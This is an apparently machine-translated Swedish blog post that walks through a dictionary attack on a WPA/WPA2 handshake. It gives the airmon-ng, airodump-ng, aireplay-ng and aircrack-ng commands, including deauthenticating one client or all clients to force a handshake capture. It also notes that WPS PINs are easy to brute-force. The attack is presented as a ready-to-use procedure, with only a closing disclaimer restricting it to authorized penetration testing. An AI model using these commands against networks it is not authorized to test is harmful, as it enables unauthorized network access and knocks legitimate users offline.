Sök

om du planerar att pentest en WPA/WPA2 nätverk (utan WPS), jag har två ord för dig: bra. Lycka.

i alla mina experiment med penetrationstestning har jag hittat ordboksattacker på WPA/WPA2 handskakningar för att vara de mest irriterande och meningslösa övningarna. Detta beror på att:

  • att gå igenom varje ord i en ordboksfil som innehåller miljontals ord är tidskrävande.
  • framgång garanteras inte (lösenfrasen kanske inte finns i din ordlista).

under mina experiment i Indien är WiFi-lösenfraserna vanligtvis en kombination av Hindi och engelska ord eller ett hinduiskt namn som naturligtvis inte finns i någon ordbok som jag laddar ner oavsett hur uttömmande det lovar att vara.

om du fortfarande är modig nog att prova en ordbok attack på WPA handskakning, här är proceduren.

uppdatering: Jag har också lagt upp en video om hur fånga och knäcka en WPA hanshake på min YouTube-kanal.

hur man startar en ordbok Attack på WPA Handshake

du kan ha tur och din närmaste WiFi lösenord kan baseras på en gemensam ordlista ord eller nummersekvens. I ett sådant fall kan du lyckas med en ordboksattack.

Steg 1: Aktivera monitorläge på trådlöst gränssnitt

airmon-ng start wlan0

detta startar monitorläget.

steg 2: notera närmaste WiFi-nätverk.

airodump-ng mon0

steg 3: notera kanalen i ditt målnätverk, dumpa paket från den kanalen och spara dem i en lokal inspelningsfil.

airodump-ng -c6 mon0 -w capture_file

steg 4: Vänta på WPA handshake capture

vid denna tidpunkt kan du använda ’aireplay-ng’ för att avaktivera en associerad legitim klient från nätverket. Poängen är att när han/hon kommer att autentisera igen inom kort kommer vi att fånga handskakningen utan att behöva vänta för länge:

aireplay-ng --deauth 0 -a <AP\_MAC> -c <CLIENT\_MAC> mon0

om du inte känner till MAC för någon associerad klient, helt enkelt ’sända’ en ’deauth’ till alla klienter:

aireplay-ng --deauth 0 -a <AP\_MAC> mon0

Steg 5: När du har tagit ett WPA-handslag kommer den svåra delen av brute forcing med en ordbok. Använd ’aircrack-ng’ för detta:

aircrack-ng capture\_file-01.cap -w /media/Pranshu/...../dic/dark0de.lst

Säg nu dina böner och hoppas att lösenfrasen finns i ordlistan du valde.

du kan också använda online distribuerad WPA / WPA2 handshake cracking tool på denna webbplats:

Observera att om åtkomstpunkten har WPS aktiverat blir det lättare att återställa WPA / WPA2-lösenfrasen eftersom det bara finns 11 000 möjliga kombinationer som behövs för att brute force WPS-stiftet på grund av en implementeringsfel.

ansvarsfriskrivning: Detta är endast för experiment eller godkända penetrationsteständamål.

Lämna ett svar

Din e-postadress kommer inte publiceras.